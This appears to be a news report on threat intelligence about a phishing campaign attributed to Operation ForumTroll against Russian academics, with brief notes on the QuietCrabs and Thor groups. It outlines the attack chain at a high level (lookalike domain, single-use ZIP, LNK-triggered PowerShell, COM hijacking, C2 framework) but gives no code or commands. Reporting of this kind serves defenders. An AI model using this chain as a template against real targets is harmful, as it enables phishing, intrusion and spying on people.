A sophisticated threat actor, previously linked to Operation ForumTroll, has resurfaced with a new wave of targeted phishing attacks aimed at individuals within Russia, according to recent findings by cybersecurity firm Kaspersky. The campaign, which began in October 2025, focuses on academics in political science, international relations, and global economics at prominent Russian universities and research institutions.
This latest activity marks a shift from earlier campaigns by the same group, which had primarily targeted organizations. The threat actor’s origins remain unknown, but their operational methodology suggests a well-resourced and persistent entity. Operation ForumTroll itself is known for leveraging vulnerabilities, including a previously undisclosed zero-day flaw in Google Chrome (CVE-2025-2783), to deploy malicious software like the LeetAgent backdoor and the Dante spyware.
Operation ForumTroll’s Evolving Tactics
The current phishing campaign commences with emails that impersonate eLibrary, a significant Russian scientific electronic library. These fraudulent messages are dispatched from an email address, “support@e-library[.]wiki,” which utilizes a domain registered in March 2025. This strategic domain aging, occurring six months prior to the campaign’s launch, was likely intended to circumvent security alerts typically associated with newly created domains.
To further bolster their deception, the attackers hosted an exact replica of the legitimate eLibrary homepage (“elibrary[.]ru”) on their spoofed domain. This tactic aimed to lend an air of authenticity and encourage potential victims to engage with the malicious content. The emails instructed recipients to click an embedded link, ostensibly to download a plagiarism report.
Should a target fall for the ruse and click the link, a ZIP archive is downloaded onto their system. The archive is meticulously named using a pattern incorporating the victim’s last name, first name, and patronymic, enhancing the personalization of the attack. Furthermore, these malicious links are designed for single use. Any subsequent attempt to access the same URL will result in a “Download failed, please try again later” message in Russian. Those attempting the download from non-Windows platforms are similarly redirected to retry on a Windows computer.
Payload and Persistence Mechanisms
Upon execution, the downloaded ZIP archive contains a Windows shortcut (LNK) file. When activated, this shortcut triggers a PowerShell script. This script then proceeds to download and launch a PowerShell-based payload hosted on a remote server. This payload communicates with a command-and-control (C2) server to retrieve a final-stage DLL. To maintain persistence, the attackers employ COM hijacking techniques.
In parallel with establishing its foothold, the payload downloads and presents a decoy PDF document to the victim. This serves to distract the user while the malicious software operates in the background. The ultimate payload deployed is a framework known as Tuoni, which functions as both a command-and-control system and a red teaming tool. This grants the threat actors comprehensive remote access and control over the victim’s Windows device.
Kaspersky notes that Operation ForumTroll has been actively targeting entities and individuals in Russia and Belarus since at least 2022. Given this prolonged operational history, it is highly probable that the group will continue its activities, focusing on individuals and organizations of interest within these regions.
Broader Threat Landscape
This latest campaign from the Operation ForumTroll actor occurs amidst a backdrop of other significant cybersecurity developments. Positives Technologies recently detailed the operations of two distinct threat clusters: QuietCrabs, suspected of being a Chinese state-sponsored hacking group also identified as UTA0178 and UNC5221, and Thor, a group implicated in ransomware attacks since May 2025.
These intrusion sets have been observed exploiting notable security vulnerabilities, including flaws in Microsoft SharePoint (CVE-2025-53770), Ivanti Endpoint Manager Mobile (CVE-2025-4427 and CVE-2025-4428), Ivanti Connect Secure (CVE-2024-21887), and Ivanti Sentry (CVE-2023-38035). QuietCrabs, for instance, leverages initial access to deploy an ASPX web shell, which in turn delivers a JSP loader capable of executing KrustyLoader. This loader then deploys the Sliver implant.
The Thor threat group, first detected targeting Russian companies in 2025, has been observed employing LockBit and Babuk ransomware as final payloads. They also utilize Tactical RMM and MeshAgent to ensure persistent access. The ongoing activities of these diverse threat actors highlight the dynamic and persistent nature of cyber threats targeting the region.
Looking ahead, the continued sophistication and adaptability of threat actors like the one behind Operation ForumTroll suggest that vigilance and robust security measures will remain paramount for individuals and organizations in Russia and neighboring countries. The focus on specific academic and research populations raises concerns about potential future targeting of sensitive information and intellectual property.